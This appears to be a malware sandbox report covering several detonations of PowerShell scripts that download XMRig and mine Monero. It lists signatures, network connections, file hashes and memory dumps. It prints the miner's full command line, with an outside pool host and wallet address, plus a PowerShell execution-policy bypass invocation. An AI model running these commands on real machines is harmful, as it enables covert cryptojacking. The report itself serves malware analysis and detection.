| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4192 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4192 wrote to memory of 2484 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4192-3-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp
memory/4192-5-0x00000254552F0000-0x0000025455312000-memory.dmp
memory/4192-6-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/4192-9-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/4192-10-0x00000254554A0000-0x0000025455516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izfphklo.5do.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4192-25-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/4192-48-0x0000025455640000-0x0000025455652000-memory.dmp
memory/4192-61-0x0000025455420000-0x000002545542A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2484-90-0x00000211B6B00000-0x00000211B6B20000-memory.dmp
memory/2484-91-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/4192-92-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/4192-94-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp
memory/2484-93-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/4192-95-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp
memory/2484-96-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-97-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-98-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-99-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-100-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-101-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-102-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-103-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-104-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-105-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-106-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-107-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-108-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-109-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-110-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-111-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-112-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-113-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-114-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-115-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-116-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-117-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-118-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-119-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-120-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-121-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-122-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-123-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-124-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-125-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-126-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-127-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-128-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-129-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-130-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-131-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-132-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-133-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-134-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-135-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-136-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-137-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-138-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-139-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-140-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-141-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-142-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-143-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-144-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-145-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-146-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-147-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-148-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-149-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-150-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-151-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-152-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-153-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-154-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-155-0x00007FF630610000-0x00007FF631243000-memory.dmp
memory/2484-156-0x00007FF630610000-0x00007FF631243000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:23
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2160 wrote to memory of 456 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2160 wrote to memory of 456 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
memory/2160-0-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp
memory/2160-10-0x0000024BF36D0000-0x0000024BF36F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aa3gmuxp.ncv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2160-11-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp
memory/2160-12-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp
memory/2160-14-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp
memory/2160-15-0x0000024BF3AD0000-0x0000024BF3AE2000-memory.dmp
memory/2160-16-0x0000024BF38A0000-0x0000024BF38AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/456-47-0x00000263FF170000-0x00000263FF190000-memory.dmp
memory/456-48-0x00000263FF1C0000-0x00000263FF1E0000-memory.dmp
memory/456-49-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-52-0x00000263FF200000-0x00000263FF220000-memory.dmp
memory/456-51-0x00000263FF1E0000-0x00000263FF200000-memory.dmp
memory/456-50-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/2160-53-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp
memory/2160-54-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp
memory/456-55-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/2160-56-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp
memory/456-57-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-58-0x00000263FF1E0000-0x00000263FF200000-memory.dmp
memory/456-59-0x00000263FF200000-0x00000263FF220000-memory.dmp
memory/456-60-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-61-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-62-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-63-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-64-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-65-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-66-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-67-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-68-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-69-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-70-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-71-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-72-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-73-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-74-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-75-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-76-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-77-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-78-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-79-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-80-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-81-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-82-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-83-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-84-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-85-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-86-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-87-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-88-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-89-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-90-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-91-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-92-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-93-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-94-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-95-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-96-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-97-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-98-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-99-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-100-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-101-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-102-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-103-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-104-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-105-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-106-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-107-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-108-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-109-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-110-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-111-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-112-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-113-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-114-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-115-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-116-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-117-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
memory/456-118-0x00007FF6D95D0000-0x00007FF6DA203000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1400 wrote to memory of 1252 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1400 wrote to memory of 1252 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/1400-0-0x00007FFB389E3000-0x00007FFB389E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2e3c334.mof.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1400-9-0x00000240C3F40000-0x00000240C3F62000-memory.dmp
memory/1400-10-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/1400-11-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/1400-12-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/1400-14-0x00000240DEA80000-0x00000240DEA92000-memory.dmp
memory/1400-15-0x00000240DE600000-0x00000240DE60A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1252-46-0x000001BEE73C0000-0x000001BEE73E0000-memory.dmp
memory/1252-47-0x000001BEE8CF0000-0x000001BEE8D10000-memory.dmp
memory/1252-48-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-50-0x000001BEE8D10000-0x000001BEE8D30000-memory.dmp
memory/1252-51-0x000001BEE8D30000-0x000001BEE8D50000-memory.dmp
memory/1400-49-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/1252-52-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1400-53-0x00007FFB389E3000-0x00007FFB389E5000-memory.dmp
memory/1400-54-0x00007FFB389E0000-0x00007FFB394A2000-memory.dmp
memory/1252-55-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-56-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-57-0x000001BEE8D10000-0x000001BEE8D30000-memory.dmp
